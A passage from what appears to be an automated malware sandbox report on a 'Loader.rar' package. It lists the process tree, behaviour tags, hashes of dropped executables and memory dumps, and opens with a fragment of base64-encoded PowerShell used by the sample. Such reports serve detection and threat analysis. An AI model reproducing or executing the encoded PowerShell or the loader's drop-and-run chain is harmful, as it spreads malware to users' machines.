cgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:1528

C:\Users\Admin\AppData\Roaming\kmap5wh5.rtl2.exe
"C:\Users\Admin\AppData\Roaming\kmap5wh5.rtl2.exe"
4⤵
PID:5528

C:\Users\Admin\AppData\Roaming\kmap5wh5.rtl3.exe
"C:\Users\Admin\AppData\Roaming\kmap5wh5.rtl3.exe"
4⤵
PID:5552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3508

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3708

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3928

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4112

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4848

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3600

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:384

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:3120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2b0,0x7ffa2d402e98,0x7ffa2d402ea4,0x7ffa2d402eb0
2⤵
PID:2336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3144 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:3
2⤵
PID:416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5016 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:1
2⤵
PID:5104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5772 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:1
2⤵
PID:636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3764 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
2⤵
PID:2448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5628 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:1
2⤵
PID:4920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5780 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
2⤵
PID:4028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=6040 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:1
2⤵
PID:2564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=4140 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:1
2⤵
PID:4188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=5960 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:1
2⤵
PID:2988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=5412 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
2⤵
PID:2208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=5936 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:1
2⤵
PID:2312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3604 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
2⤵
- Drops file in Program Files directory
PID:1236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5328 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
2⤵
PID:4216

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Loader.rar"
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2968

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO89BE2BE8\Password.txt
3⤵
- Opens file in notepad (likely ransom note)
PID:3704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=4640 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
2⤵
PID:3888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=6508 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
2⤵
PID:4176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:2812

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
1⤵
PID:3496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:888

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4668

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:1516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:2364

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1008

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log
Filesize
226B

MD5
28d7fcc2b910da5e67ebb99451a5f598

SHA1
a5bf77a53eda1208f4f37d09d82da0b9915a6747

SHA256
2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

SHA512
2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d34112a7b4df3c9e30ace966437c5e40

SHA1
ec07125ad2db8415cf2602d1a796dc3dfc8a54d6

SHA256
cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf

SHA512
49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d336b18e0e02e045650ac4f24c7ecaa7

SHA1
87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

SHA256
87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

SHA512
e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2247453c28acd1eb75cfe181540458a8

SHA1
851fc5a9950d422d76163fdc6a453d6859d56660

SHA256
358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd

SHA512
42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0d53533b226ada04703fc90b556978a4

SHA1
4bf5e331fce099468eb2f4f34cbedf9411ddb8ae

SHA256
1589ebd677356cd2f45d1c79acfe8b8c2e03fa64931aff06e0fd9298cddd58e3

SHA512
1215eb84f69328a4bd085dddb4451d027d2569f4d7990b2e492682e17c5aa327015016a27cd384aa4968dfbaea731446b74b0562d73a41ce280e5caab32e3b55

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO89BE2BE8\Password.txt
Filesize
89B

MD5
1ef53826ba072b8b014ccb6739bd9e2f

SHA1
e3cd91d8ecd143e93a19b94f37f546a8fc9e58c8

SHA256
60cf7ce1de44d6591dba90246dc1f2d4b3d25ffae2084cf17fcd975f56bb996b

SHA512
3cbdf8c6481fef5686a828b749bc87a2fffe524cd46cbdb18b2110b8ac6b247835383a6604a9a32ae6c71268663859fde7457f7ee7549c1f345783f5ce1b14ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lh1oqmnq.145.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr2.exe
Filesize
355KB

MD5
c93d65bc0ed7ee88d266b4be759301f8

SHA1
8c0c415ba824737c61904676e7132094f5710099

SHA256
f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f

SHA512
7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1

Download Submit
C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr3.exe
Filesize
5.2MB

MD5
f55fc8c32bee8f7b2253298f0a0012ba

SHA1
574c7a8f3eb378c03f58bc96252769296b20970e

SHA256
cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9

SHA512
c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a

Download Submit
C:\Users\Admin\Desktop\Loader.rar
Filesize
3.8MB

MD5
6708336a25163b73dd47bc09f57818fa

SHA1
36a31642c5f77cba5c4c0de905063e0b033a4986

SHA256
b1ee03942664668e5e21997036234359542ee889c8d51e2699cbe6c8727cd19d

SHA512
34e8f4913a393f71032699b32deb65103268b72e830ca870003a117a0c4a9bd7d4fb2e60cb520788fbffc08ec6cb9b189d93995d5f93e864befe89cf7946cbf1

Download Submit
C:\Users\Admin\Desktop\Loader\Launcher.dll
Filesize
7.5MB

MD5
cbb81f28c5a509e4f7e3e44bc7da74f8

SHA1
47145f07bc7d0083d3bd13a9da44bac740952029

SHA256
413bf9c2cff6fe7b97eae199683df7f6d648fad4c25cb6d0b7dce335eb69edba

SHA512
bc863ebb2f5fd66f342be8befb49889dd275adb15cff95ed378e185190091589c8d1d7a8902ca889a7b2af81588c731bfa0a930f074fecadd9b47a082966079c

Download Submit
C:\Users\Admin\Desktop\Loader\Loader.exe
Filesize
7KB

MD5
b5e479d3926b22b59926050c29c4e761

SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24

SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

Download Submit
C:\Users\Admin\Desktop\Loader\mainf.dll
Filesize
6KB

MD5
dfbad6728654395df7cdc4626686bdd7

SHA1
63686f523d7b4bf33c6184ce7d870fa326ce4bba

SHA256
ba7ee4cc8044c4aeac2c9b698a32a6d01020097e14730abc7040cd9f0ee0608c

SHA512
e2ff8afcd090adc2a846152fa5f0055ade47b8d9a19e6d2ff1f20092b987db98729388142f56af716b8dc659e66188ecfa4ba35b55353e7636a58a78c7ce6abd

Download Submit
memory/336-226-0x000001E4B6A30000-0x000001E4B6A5B000-memory.dmp

Filesize
172KB

Download
memory/336-227-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp

Filesize
64KB

Download
memory/628-223-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp

Filesize
64KB

Download
memory/628-218-0x00000200A2090000-0x00000200A20B4000-memory.dmp

Filesize
144KB

Download
memory/628-222-0x00000200A24B0000-0x00000200A24DB000-memory.dmp

Filesize
172KB

Download
memory/652-115-0x00000000003A0000-0x000000000040D000-memory.dmp

Filesize
436KB

Download
memory/652-69-0x00000000003A0000-0x000000000040D000-memory.dmp

Filesize
436KB

Download
memory/652-107-0x0000000004420000-0x0000000004820000-memory.dmp

Filesize
4.0MB

Download
memory/652-108-0x0000000004420000-0x0000000004820000-memory.dmp

Filesize
4.0MB

Download
memory/652-109-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmp

Filesize
2.0MB

Download
memory/652-111-0x0000000077150000-0x0000000077365000-memory.dmp

Filesize
2.1MB

Download
memory/692-236-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmp

Filesize
64KB

Download
memory/692-234-0x0000022B1C300000-0x0000022B1C32B000-memory.dmp

Filesize
172KB

Download
memory/916-585-0x0000000000360000-0x00000000003CD000-memory.dmp

Filesize
436KB

Download
memory/916-538-0x0000000000360000-0x00000000003CD000-memory.dmp

Filesize
436KB

Download
memory/2356-213-0x00007FFA54230000-0x00007FFA542EE000-memory.dmp

Filesize
760KB

Download
memory/2356-206-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2356-215-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2356-208-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2356-209-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2356-211-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2356-212-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmp

Filesize
2.0MB

Download
memory/2356-207-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2656-165-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmp

Filesize
2.0MB

Download
memory/2656-152-0x0000000000380000-0x00000000003ED000-memory.dmp

Filesize
436KB

Download
memory/2656-164-0x0000000003480000-0x0000000003880000-memory.dmp

Filesize
4.0MB

Download
memory/2656-167-0x0000000077150000-0x0000000077365000-memory.dmp

Filesize
2.1MB

Download
memory/2656-169-0x0000000000380000-0x00000000003ED000-memory.dmp

Filesize
436KB

Download
memory/3300-634-0x0000000000620000-0x000000000068D000-memory.dmp

Filesize
436KB

Download
memory/3300-661-0x0000000000620000-0x000000000068D000-memory.dmp

Filesize
436KB

Download
memory/3448-120-0x0000000002A80000-0x0000000002E80000-memory.dmp

Filesize
4.0MB

Download
memory/3448-114-0x0000000000EA0000-0x0000000000EA9000-memory.dmp

Filesize
36KB

Download
memory/3448-126-0x0000000077150000-0x0000000077365000-memory.dmp

Filesize
2.1MB

Download
memory/3448-124-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmp

Filesize
2.0MB

Download
memory/3476-116-0x00000000033E0000-0x00000000037E0000-memory.dmp

Filesize
4.0MB

Download
memory/3476-93-0x0000000000660000-0x00000000006CD000-memory.dmp

Filesize
436KB

Download
memory/3476-121-0x0000000077150000-0x0000000077365000-memory.dmp

Filesize
2.1MB

Download
memory/3476-118-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmp

Filesize
2.0MB

Download
memory/3476-123-0x0000000000660000-0x00000000006CD000-memory.dmp

Filesize
436KB

Download
memory/3812-751-0x0000000000A70000-0x0000000000A78000-memory.dmp

Filesize
32KB

Download
memory/3864-128-0x0000000002960000-0x0000000002D60000-memory.dmp

Filesize
4.0MB

Download
memory/4184-44-0x000001E1C0E60000-0x000001E1C0E82000-memory.dmp

Filesize
136KB

Download
memory/4336-580-0x0000000000220000-0x0000000000228000-memory.dmp

Filesize
32KB

Download
memory/4556-33-0x00000000006A0000-0x00000000006A8000-memory.dmp

Filesize
32KB

Download
memory/4824-172-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmp

Filesize
2.0MB

Download
memory/4824-174-0x0000000077150000-0x0000000077365000-memory.dmp

Filesize
2.1MB

Download
memory/4824-171-0x0000000002830000-0x0000000002C30000-memory.dmp

Filesize
4.0MB

Download
memory/5528-1032-0x0000000000080000-0x00000000000ED000-memory.dmp

Filesize
436KB

Download
memory/5528-1067-0x0000000000080000-0x00000000000ED000-memory.dmp

Filesize
436KB

Download
memory/5664-674-0x00000000007C0000-0x00000000007C8000-memory.dmp

Filesize
32KB

Download
memory/6052-562-0x00000000000A0000-0x000000000010D000-memory.dmp

Filesize
436KB

Download
memory/6052-507-0x00000000000A0000-0x000000000010D000-memory.dmp

Filesize
436KB

Download
memory/6092-710-0x0000000000D50000-0x0000000000DBD000-memory.dmp

Filesize
436KB

Download
memory/6092-735-0x0000000000D50000-0x0000000000DBD000-memory.dmp

Filesize
436KB

Download